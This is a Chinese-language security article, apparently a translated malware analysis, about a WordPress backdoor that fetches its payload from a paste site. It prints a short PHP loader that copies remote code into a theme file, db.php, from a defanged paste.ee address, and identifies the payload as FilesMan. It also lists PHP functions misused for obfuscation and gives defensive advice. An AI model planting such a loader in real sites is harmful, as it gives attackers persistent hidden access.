後門使用粘貼網址來保存payload

網站後門

後門是攻擊者故意留下用於之後訪問站點的惡意軟體。黑客喜歡在不同的位置注入代碼來增加保持對網站控制權的機會，這樣就可以繼續感染受害者網站了。

今年都在討論解碼含有PHP函數的複雜惡意軟體的新方法。常見的PHP函數有：

·eval, 把一段字元串當作PHP語句來執行

·create_function, 主要用來創建匿名函數

·preg_replace, 正則查找替換函數

·assert, 斷言函數

·base64_decode.

根據最新的網站被黑報告，過去的一年：

·被黑的網站中有71%隱藏有基於PHP的後門。

·這些後門的有效性來源於大多數網站掃描技術的繞過。

不常見的後門

不常見的後門看似合法代碼，大多數的惡意軟體掃描器都無法掃描到。

在應急響應調查中，研究人員發現一個小的、簡單、但有效的後門。

後門的內容會上傳到wp-content/themes/buildup/db.php文件，看起來是這樣的：

if ( @copy("hxxps://paste[.]ee/r/3TwsC/0", "db.php") ) {

echo "Copy_success";

}else{

echo "Copy_failed";

}

?>

這一段代碼會從hxxps://paste[.].ee處下載全部的惡意軟體。

有一款免費的工具會混淆下載的代碼，這樣的工具對惡意軟體開發者來說是很容易的。研究人員還發現一些合法的代碼也會使用這種免費的工具。

混淆的代碼從網站下載惡意軟體

反混淆後就獲得了可讀的代碼：

從中可以看出這是FilesMan後門的一個副本，FilesMan後門是隱藏在文件系統中的後門，會使其在不訪問伺服器或日誌的情況下很難被發現。

如何避免網站後門？

後門很難發現，也很難去除。首先，研究人員建議經常性的監控日誌是否有不常見的行為。其次，為了避免網站被感染，研究人員建議應用文件完整性監控和WAF這樣的安全措施。

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！